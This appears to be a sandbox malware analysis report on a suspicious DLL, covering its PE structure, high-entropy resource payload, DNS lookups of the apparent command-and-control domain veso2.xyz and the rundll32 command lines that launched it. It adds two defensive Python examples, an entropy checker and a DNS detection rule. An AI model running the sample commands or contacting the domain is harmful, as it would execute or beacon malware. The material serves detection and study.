IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xb6a | 0x1000 | False | 0.48388671875 | data | 5.19561194668 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x2000 | 0x278 | 0x1000 | False | 0.093505859375 | data | 1.04880421735 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3000 | 0x7a0 | 0x1000 | False | 0.10888671875 | data | 1.05286308404 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x4000 | 0x6920 | 0x7000 | False | 0.882184709821 | data | 7.55339146769 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xb000 | 0x60e | 0x1000 | False | 0.057861328125 | data | 0.51201509742 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
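The Raw Size and Entropy columns are what an analyst reads first in this table: a section that is not code, is large, and sits near 8 bits per byte almost always holds a packed or encrypted payload. Here `.rsrc` (0x7000 raw bytes, entropy 7.55) trips that rule while `.text` (5.20) does not, which fits the `RT_MESSAGETABLE` resource of 0x5f33 bytes listed below and the 85.2% dynamic/decrypted code coverage reported further down. The script below is an added example, not part of the sandbox report or the sample: a standard-library walk of the PE section table that recomputes those two columns and applies the rule. The image used in its self-test is built by `build_sample_pe()` and is not the analysed file; the 7.0 and 0x1000 thresholds are assumptions, not values from the report.

```python
"""Walk a PE section table and compute per-section Shannon entropy.

Added example, not part of the sandbox report. build_sample_pe() returns
a constructed three-section PE32 image for the self-test; the entropy
and size thresholds in suspicious_sections() are assumptions.
"""
import math
import struct
import sys

IMAGE_SCN_CNT_CODE = 0x00000020
COFF_FMT = "<HHIIIHH"          # Machine, NumberOfSections, TimeDateStamp, PtrSymTab, NumSyms, SizeOfOptionalHeader, Characteristics
SECTION_FMT = "<8sIIIIIIHHI"   # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, relocs/linenums, Characteristics


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(image: bytes) -> list:
    """DOS header -> e_lfanew -> PE signature -> COFF header -> section headers."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from(COFF_FMT, image, coff)
    first = coff + struct.calcsize(COFF_FMT) + opt_size   # section table follows the optional header
    sections = []
    for i in range(nsections):
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            SECTION_FMT, image, first + i * struct.calcsize(SECTION_FMT))
        raw = image[raw_ptr:raw_ptr + raw_size]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": va, "virtual_size": vsize, "raw_size": raw_size,
            "characteristics": chars, "is_code": bool(chars & IMAGE_SCN_CNT_CODE),
            "entropy": shannon_entropy(raw),
        })
    return sections


def suspicious_sections(sections, min_entropy=7.0, min_raw=0x1000) -> list:
    """Names of non-code sections large and random enough to hold an embedded payload (thresholds assumed)."""
    return [s["name"] for s in sections
            if not s["is_code"] and s["raw_size"] >= min_raw and s["entropy"] >= min_entropy]


def build_sample_pe() -> bytes:
    """Constructed three-section PE32 image for the self-test (headers in the first 0x200 bytes)."""
    text = bytes([0x55, 0x8B]) * 0x200          # two symbols, equally likely -> entropy 1.0
    rdata = bytes(0x200)                        # constant -> entropy 0.0
    rsrc = bytes(range(256)) * 16               # uniform -> entropy 8.0, 0x1000 bytes
    hdr = bytearray(0x200)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)                                  # e_lfanew
    hdr[0x40:0x44] = b"PE\0\0"
    struct.pack_into(COFF_FMT, hdr, 0x44, 0x14C, 3, 0, 0, 0, 0xE0, 0x2102)   # i386, 3 sections, PE32 opt header, DLL
    struct.pack_into("<H", hdr, 0x58, 0x10B)                                 # optional header Magic (PE32)
    table = 0x44 + struct.calcsize(COFF_FMT) + 0xE0
    layout = [(b".text", 0x1000, text, 0x60000020),    # EXECUTE | READ | CNT_CODE
              (b".rdata", 0x2000, rdata, 0x40000040),  # READ | CNT_INITIALIZED_DATA
              (b".rsrc", 0x3000, rsrc, 0x40000040)]
    raw_ptr = 0x200
    for i, (name, va, data, chars) in enumerate(layout):
        struct.pack_into(SECTION_FMT, hdr, table + i * 40,
                         name, len(data), va, len(data), raw_ptr, 0, 0, 0, 0, chars)
        raw_ptr += len(data)
    return bytes(hdr) + text + rdata + rsrc


def main(path=None):
    image = open(path, "rb").read() if path else build_sample_pe()
    sections = parse_sections(image)
    for s in sections:
        print(f"{s['name']:<8} va=0x{s['virtual_address']:x} raw=0x{s['raw_size']:x} entropy={s['entropy']:.2f}")
    print("suspicious:", ", ".join(suspicious_sections(sections)) or "none")


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else None)
```

`python3 pe_sections.py 4123.dll` should reproduce the section names, raw sizes and entropies in the table above and report `.rsrc` as the only suspicious section. The rule deliberately skips code sections, since a UPX-style packer raises `.text` entropy for benign reasons; for a resource-carried payload the next step is to extract the large `RT_MESSAGETABLE` entry and look for the XOR or RC4 routine that the loader applies to it.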

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x42a0 | 0x2e8 | data | English | United States
RT_ICON | 0x4588 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x46d8 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
RT_MENU | 0xa750 | 0x4a | data | English | United States
RT_DIALOG | 0xa7b0 | 0xfa | data | English | United States
RT_STRING | 0xa8b0 | 0x6a | data | English | United States
RT_ACCELERATOR | 0xa7a0 | 0x10 | data | English | United States
RT_MESSAGETABLE | 0x4818 | 0x5f33 | data | English | United States
RT_GROUP_ICON | 0x46b0 | 0x22 | data | English | United States
RT_GROUP_ICON | 0x4800 | 0x14 | data | English | United States

Imports

DLL | Import
KERNEL32.dll | ExitProcess, LoadLibraryW, GetProcAddress, DisableThreadLibraryCalls
MSVCP60.dll | ??0Init@ios_base@std@@QAE@XZ, ??0_Winit@std@@QAE@XZ, ??1_Winit@std@@QAE@XZ, ??1Init@ios_base@std@@QAE@XZ
MSVCRT.dll | malloc, free, atoi, __dllonexit, _onexit, _initterm, _adjust_fdiv

Exports

Name | Ordinal | Address
DF1 | 1 | 0x10001530

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Network Port Distribution

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 8, 2021 14:29:22.020349979 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:29:23.145103931 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:29:23.159771919 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:29:24.749634027 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:29:24.762242079 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:29:25.518115044 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:29:25.533590078 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:29:27.145659924 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:29:27.181631088 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:29:27.253982067 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:29:27.267417908 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:29:27.925820112 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:29:27.939580917 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:29:28.556616068 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:29:28.571469069 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:29:30.480237961 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:29:30.495018005 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:29:37.059997082 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:29:37.077299118 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:29:37.171709061 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:29:37.186023951 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:29:41.178985119 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:29:41.192791939 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:29:53.069598913 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:29:53.083688021 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:30:02.037838936 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:30:02.050606012 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:30:09.091437101 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:30:09.231167078 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:30:09.779707909 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:30:09.925051928 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:30:10.395690918 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:30:10.410343885 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:30:10.756151915 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:30:10.793107033 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:30:13.918431997 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:30:13.932979107 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:30:14.776710033 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:30:14.791197062 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:30:15.563446045 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:30:15.841141939 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:30:16.507224083 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:30:16.520334005 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:30:16.786179066 CEST | 49612 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:30:16.800784111 CEST | 53 | 49612 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:30:18.016479015 CEST | 49285 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:30:18.030330896 CEST | 53 | 49285 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:30:20.112616062 CEST | 50601 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:30:20.125422001 CEST | 53 | 50601 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:30:20.256707907 CEST | 60875 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:30:20.272202969 CEST | 53 | 60875 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:30:20.707715988 CEST | 56448 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:30:20.721771955 CEST | 53 | 56448 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:30:23.934767008 CEST | 59172 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:30:23.950438976 CEST | 53 | 59172 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:30:24.609482050 CEST | 62420 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:30:24.627530098 CEST | 53 | 62420 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:30:25.777808905 CEST | 60579 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:30:25.790393114 CEST | 53 | 60579 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:30:27.415144920 CEST | 50183 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:30:27.610382080 CEST | 61531 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:30:27.623883963 CEST | 53 | 61531 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:30:28.419294119 CEST | 50183 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:30:28.433654070 CEST | 53 | 50183 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:30:31.079299927 CEST | 49228 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:30:31.095681906 CEST | 53 | 49228 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:30:31.725174904 CEST | 59794 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:30:31.739020109 CEST | 53 | 59794 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:30:32.307065010 CEST | 55916 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:30:32.328953981 CEST | 53 | 55916 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:30:42.842799902 CEST | 52752 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:30:43.843122005 CEST | 52752 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:30:43.857826948 CEST | 53 | 52752 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:30:57.447335958 CEST | 60542 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:30:57.461633921 CEST | 53 | 60542 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:30:58.493922949 CEST | 60689 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:30:58.509104013 CEST | 53 | 60689 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:30:59.168838024 CEST | 64206 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:30:59.183671951 CEST | 53 | 64206 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:31:00.355638027 CEST | 50904 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:31:00.368513107 CEST | 53 | 50904 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:31:01.140944004 CEST | 57525 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:31:02.140784979 CEST | 57525 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:31:02.154592037 CEST | 53 | 57525 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:31:03.415580988 CEST | 53814 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:31:03.428740025 CEST | 53 | 53814 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:31:03.688951969 CEST | 53418 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:31:04.687899113 CEST | 53418 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:31:04.702517033 CEST | 53 | 53418 | 8.8.8.8 | 192.168.2.4
Apr 8, 2021 14:31:05.423943996 CEST | 62833 | 53 | 192.168.2.4 | 8.8.8.8
Apr 8, 2021 14:31:05.438870907 CEST | 53 | 62833 | 8.8.8.8 | 192.168.2.4

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 8, 2021 14:29:27.145659924 CEST | 192.168.2.4 | 8.8.8.8 | 0x66a5 | Standard query (0) | veso2.xyz | A (IP address) | IN (0x0001)
Apr 8, 2021 14:29:27.253982067 CEST | 192.168.2.4 | 8.8.8.8 | 0x2abb | Standard query (0) | veso2.xyz | A (IP address) | IN (0x0001)
Apr 8, 2021 14:29:30.480237961 CEST | 192.168.2.4 | 8.8.8.8 | 0xff2 | Standard query (0) | veso2.xyz | A (IP address) | IN (0x0001)
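Three A queries for the same low-reputation domain inside 3.4 seconds, issued by `rundll32.exe` rather than a browser or a service, is the pattern the "Rundll32 performs DNS lookup" signature keys on. On a production host the same behaviour surfaces as Sysmon Event ID 22 (DnsQuery) records. The detector below is an added example, not part of the sandbox report: it groups such records by process and domain and raises three independent alerts (host-process DNS, cheap-TLD domain, retry burst). The events are constructed to mirror the table above; the PID, the benign `svchost.exe` and `chrome.exe` events, the `regsvr32.exe`/`mshta.exe` entries in `HOST_PROCESSES` and the TLD list are assumptions for the test, not values from the report.

```python
"""Flag DNS lookups issued by rundll32 and similar host processes.

Added example, not part of the sandbox report. SAMPLE_EVENTS are
constructed Sysmon Event ID 22 records; the PID, the benign events,
the extra HOST_PROCESSES names and CHEAP_TLDS are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# rundll32.exe is what the report shows; regsvr32/mshta are assumed to belong in the same class.
HOST_PROCESSES = {"rundll32.exe", "regsvr32.exe", "mshta.exe"}
# Assumption: TLDs that rarely appear in enterprise traffic but are common for throwaway C2 domains.
CHEAP_TLDS = {"xyz", "top", "icu"}
# A retry burst: BURST_COUNT queries for one name from one process inside BURST_WINDOW.
BURST_COUNT, BURST_WINDOW = 3, timedelta(seconds=10)

SAMPLE_EVENTS = [   # constructed Sysmon EID 22 records (UtcTime, ProcessId, Image, QueryName)
    {"UtcTime": "2021-04-08 12:29:27.145", "ProcessId": 7132,
     "Image": r"C:\Windows\SysWOW64\rundll32.exe", "QueryName": "veso2.xyz"},
    {"UtcTime": "2021-04-08 12:29:27.253", "ProcessId": 7132,
     "Image": r"C:\Windows\SysWOW64\rundll32.exe", "QueryName": "veso2.xyz"},
    {"UtcTime": "2021-04-08 12:29:30.480", "ProcessId": 7132,
     "Image": r"C:\Windows\SysWOW64\rundll32.exe", "QueryName": "veso2.xyz"},
    {"UtcTime": "2021-04-08 12:29:28.010", "ProcessId": 1204,
     "Image": r"C:\Windows\System32\svchost.exe", "QueryName": "ctldl.windowsupdate.com"},
    {"UtcTime": "2021-04-08 12:29:29.300", "ProcessId": 5516,
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "QueryName": "example.org"},
]


def _ts(event: dict) -> datetime:
    return datetime.strptime(event["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")


def _proc(event: dict) -> str:
    """Image basename, lower-cased; split on backslash so it works off-Windows too."""
    return event["Image"].rsplit("\\", 1)[-1].lower()


def detect(events: list) -> list:
    """One alert per (pid, image, domain) for each rule that fires, ordered by first sighting."""
    groups = defaultdict(list)
    for e in events:
        groups[(e["ProcessId"], _proc(e), e["QueryName"].lower().rstrip("."))].append(_ts(e))
    alerts = []
    for (pid, proc, domain), times in groups.items():
        times.sort()
        base = {"pid": pid, "image": proc, "domain": domain,
                "count": len(times), "first_seen": times[0]}
        # Rule 1: DLL/script host processes have no business resolving names on their own.
        # EID 22 carries no command line; join on ProcessGuid with EID 1 to allow-list
        # rundll32 invocations of signed Microsoft DLLs before deploying this rule.
        if proc in HOST_PROCESSES:
            alerts.append({"rule": "lolbin_dns_query", **base})
        # Rule 2: cheap TLD (assumed list).
        if domain.rsplit(".", 1)[-1] in CHEAP_TLDS:
            alerts.append({"rule": "suspicious_tld", **base})
        # Rule 3: sliding window over sorted timestamps for a retry burst.
        if any(times[i + BURST_COUNT - 1] - times[i] <= BURST_WINDOW
               for i in range(len(times) - BURST_COUNT + 1)):
            alerts.append({"rule": "dns_retry_burst", **base})
    return sorted(alerts, key=lambda a: (a["first_seen"], a["rule"]))


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a['rule']:<18} pid={a['pid']} {a['image']} -> {a['domain']} "
              f"x{a['count']} first={a['first_seen']:%H:%M:%S.%f}")
```

All three rules fire on the rundll32 group and none on the two benign events. Any one of the rules alone is noisy; a `rundll32.exe` lookup of a `.xyz` name repeated three times in seconds is the combination worth paging on.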

Code Manipulations

System Behavior

General

Start time:14:29:26
Start date:08/04/2021
Path:C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):true
Commandline:loaddll32.exe 'C:\Users\user\Desktop\4123.dll'
Imagebase:0x13a0000
File size:116736 bytes
MD5 hash:542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:14:29:26
Start date:08/04/2021
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\4123.dll',#1
Imagebase:0x11d0000
File size:232960 bytes
MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:14:29:26
Start date:08/04/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe C:\Users\user\Desktop\4123.dll,DF1
Imagebase:0x11c0000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:14:29:26
Start date:08/04/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe 'C:\Users\user\Desktop\4123.dll',#1
Imagebase:0x11c0000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:14:29:28
Start date:08/04/2021
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 1008
Imagebase:0xae0000
File size:434592 bytes
MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:14:29:28
Start date:08/04/2021
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7120 -s 1008
Imagebase:0xae0000
File size:434592 bytes
MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:14:29:29
Start date:08/04/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe 'C:\Users\user\Desktop\4123.dll',DF1
Imagebase:0x11c0000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:14:29:31
Start date:08/04/2021
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5752 -s 1008
Imagebase:0xae0000
File size:434592 bytes
MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Disassembly

Code Analysis


    Execution Graph

    Execution Coverage:24.5%
    Dynamic/Decrypted Code Coverage:85.2%
    Signature Coverage:23.2%
    Total number of Nodes:345
    Total number of Limit Nodes:15

    Graph

    execution_graph: interactive call graph (345 nodes, 15 limit nodes, see the counts above); the raw node and edge dump is omitted here. APIs that appear as graph nodes, reached both from the DLL image (0x10001000 range) and from dynamically allocated code regions (0x1160000 to 0x11b2000 and 0x4851000 ranges): __dllonexit, _onexit, _initterm, atoi, ExitProcess, FreeLibrary, GetPEB (the viewer's label for a direct PEB read), GetNativeSystemInfo, VirtualAlloc, VirtualProtect, VirtualQuery, VirtualFree, GetProcessHeap, RtlAllocateHeap, HeapAlloc, HeapFree, LoadLibraryW, LoadLibraryA, GetProcAddress, SetLastError, IsBadReadPtr, IsBadHugeReadPtr. Three nodes in the 0x4851000 range are collapsed by the viewer as "13 API calls", "6 API calls" and "21 API calls". The dump is truncated at node 2572.
11b198a 2571->2572 2573 11b1996 SetLastError 2572->2573 2575 11b19c0 2572->2575 2573->2567 2575->2567 2576 11b1ad1 SetLastError 2575->2576 2576->2567 2577->2568 2678 11a1840 LoadLibraryA 2679 11a1857 2678->2679 2578 100010a0 2583 100010b0 ??0_Winit@std@@QAE 2578->2583 2681 10001060 2686 10001070 ??0Init@ios_base@std@@QAE 2681->2686 2687 11a157a 2688 11a1688 2687->2688 2689 11a169f 2688->2689 2690 11a1693 SetLastError 2688->2690 2690->2689 2584 10001aa1 2585 10001ab4 2584->2585 2590 10001abd 2584->2590 2586 10001ae5 2585->2586 2601 10001b4a 2585->2601 2590->2585 2590->2586 2594 100019f6 2590->2594 2591 10001b05 2591->2586 2593 100019f6 3 API calls 2591->2593 2592 100019f6 3 API calls 2592->2591 2593->2586 2595 100019fe 2594->2595 2596 10001a1f malloc 2595->2596 2598 10001a34 2595->2598 2600 10001a5e 2595->2600 2597 10001a38 _initterm 2596->2597 2596->2598 2597->2598 2598->2585 2599 10001a8b free 2599->2598 2600->2598 2600->2599 2602 10001b51 2601->2602 2603 10001af1 2601->2603 2602->2603 2604 10001b5a DisableThreadLibraryCalls 2602->2604 2603->2586 2603->2591 2603->2592 2604->2603 2605 1161fbe 2608 116092e 2605->2608 2611 116095e 2608->2611 2610 1160959 2613 116097b 2611->2613 2612 11609a5 2612->2610 2613->2612 2614 1160d2d GetPEB 2613->2614 2614->2612 2615 11a2430 2616 11a243c 2615->2616 2617 11a2441 VirtualProtect 2615->2617 2619 11a2472 2617->2619 2618 11a24a4 VirtualProtect 2618->2616 2619->2616 2619->2618 2691 11a1870 GetProcAddress 2692 11b1df6 2693 11b1f5c 2692->2693 2694 11b2120 4 API calls 2693->2694 2695 11b1f68 2694->2695 2265 10001530 2280 10001100 LoadLibraryW GetProcAddress 2265->2280 2268 10001547 2282 100010e0 GetPEB 2268->2282 2269 1000153c ExitProcess 2272 1000164a 2283 100010e0 GetPEB 2272->2283 2273 100018c3 atoi VirtualAlloc 2284 10001140 2273->2284 2274 100017ac 2274->2273 2276 10001910 2277 10001917 atoi 2276->2277 2278 10001932 2276->2278 2279 10001140 LoadLibraryW 2277->2279 2279->2278 2281 10001122 2280->2281 2281->2268 2281->2269 
2282->2272 2283->2274 2285 10001155 2284->2285 2287 1000117b 2284->2287 2286 1000115e LoadLibraryW 2285->2286 2285->2287 2286->2287 2287->2276 2287->2287 2696 11a21ea 2697 11a21f3 IsBadHugeReadPtr 2696->2697 2698 11a23bb 2697->2698 2699 11a2207 2697->2699 2699->2698 2700 11a2239 SetLastError 2699->2700 2701 11a224d 2699->2701 2700->2698 2702 11a1a20 3 API calls 2701->2702 2703 11a2267 2702->2703 2704 11a2273 SetLastError 2703->2704 2706 11a229d 2703->2706 2704->2698 2706->2698 2707 11a23ae SetLastError 2706->2707 2707->2698 2708 10001970 2709 10001978 2708->2709 2710 10001985 2709->2710 2712 100019a0 free 2709->2712 2712->2710 2628 11a14a0 2629 11a14e8 2628->2629 2630 11a14d9 SetLastError 2628->2630 2631 11a1505 SetLastError 2629->2631 2632 11a1514 2629->2632 2642 11a169f 2630->2642 2631->2642 2633 11a1562 2632->2633 2634 11a1527 2632->2634 2637 11a156b SetLastError 2633->2637 2638 11a157f 2633->2638 2635 11a153a SetLastError 2634->2635 2636 11a1549 2634->2636 2635->2642 2636->2642 2643 11a1693 SetLastError 2636->2643 2637->2642 2639 11a1648 bsearch 2638->2639 2647 11a19f0 VirtualAlloc 2638->2647 2639->2636 2641 11a1672 SetLastError 2639->2641 2641->2642 2643->2642 2644 11a15b3 2645 11a15c8 SetLastError 2644->2645 2646 11a15d7 2644->2646 2645->2642 2646->2639 2647->2644 2713 11a25e0 LoadLibraryExA 2714 11a2608 2713->2714 2715 11a260c GetProcAddress 2713->2715 2716 11a2627 VirtualProtect VirtualProtect 2715->2716 2716->2714 2649 1164528 LoadLibraryW GetProcAddress

    Executed Functions

    Control-flow Graph

    C-Code - Quality: 100%
    			E048511A0() {
    				struct HINSTANCE__* _v8;
    				struct HINSTANCE__* _v12;
    				void* _t32;
    				void* _t40;
    
    				_v8 = LoadLibraryA("msvcrt.dll");
    				_v12 = LoadLibraryA("kernel32.dll");
    				 *0x4853010 = GetProcAddress(_v8, "realloc");
    				 *0x4853020 = GetProcAddress(_v8, "exit");
